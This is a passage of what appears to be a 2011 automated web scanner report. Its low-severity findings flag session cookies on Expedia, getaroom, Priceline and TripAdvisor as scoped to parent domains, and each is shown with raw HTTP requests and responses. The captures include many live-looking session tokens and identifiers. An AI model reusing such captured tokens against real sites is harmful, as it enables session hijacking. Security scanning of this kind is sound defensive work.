Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; iEAPID=21187; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:38 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX01B27DF898$F1$88002000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; Domain=.expedia.com; Path=/
Set-Cookie: p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:06:28 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":5,"BookingCount":3,"HotelId":894999,"isValidViewCount":true,"isValidBookingCount":true}]}
13.14. http://www.expedia.com/Hotels/Offers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=4215&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 00:14:15 GMT
Connection: close
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:13 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:18:03 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":24,"BookingCount":59,"HotelId":4215,"isValidViewCount":true,"isValidBookingCount":true}]}
13.15. http://www.getaroom.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
13.16. http://www.getaroom.com/browse/market_deals  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...
13.17. http://www.getaroom.com/searches/show  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?destination=+&check_in=10/09/2011&check_out=10/16/2011&num_guests=1&num_rooms=1&affiliate=032ea00e HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com
X-Runtime: 7
Content-Length: 277
Set-Cookie: affiliate=032ea00e; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoQX2NzcmZfdG9rZW4iMVR4WEUwczk1eTNLa0dhMUZCZ2FIYnFzNEpPTmppTnlIUVA4ckNaYnpJVkE9Og9zZXNzaW9uX2lkIiU0ZjBiYzY1ODhkZDU2OGRkMDI3MmI1NzY4NDhkZTZmMSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--497837da868085a13e75b3c8521055c245269263; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&amp;check_out=10%2F16%2F2011&amp;destination=+&amp;num_guests=1&amp;num_rooms=1&amp;utm_campaign=Affili
...[SNIP]...
13.18. http://www.getaroom.com/washington-dc  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
13.19. http://www.priceline.com/QP.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /QP.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=priceline&grp=9706&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=154&pos=1&aii=d1125990-8f30-4f2a-83dc-0b115fb728a1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7684
Content-Type: text/html
Set-Cookie: Referral=CLICKID=HOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A43&ID=IGOUGO; expires=Wed, 02-Nov-2011 00:09:42 GMT; domain=.priceline.com; path=/
Set-Cookie: PSessKey=721510AC6F1410AC2011100300094354c311228538; domain=.priceline.com; path=/
Set-Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; expires=Thu, 30-Sep-2021 00:09:42 GMT; domain=.priceline.com; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Cache-Control" CONTENT="no cache">
<meta HTTP-EQUIV="Pragma" CONTENT="no cache">
<meta HTTP-EQUIV="Expires" CONTENT="0">
<meta HTTP-EQUIV="content-type"
...[SNIP]...
13.20. http://www.priceline.com/hotels/lang/en-us/itinerary.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...
13.21. http://www.tripadvisor.com/CheckMore  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
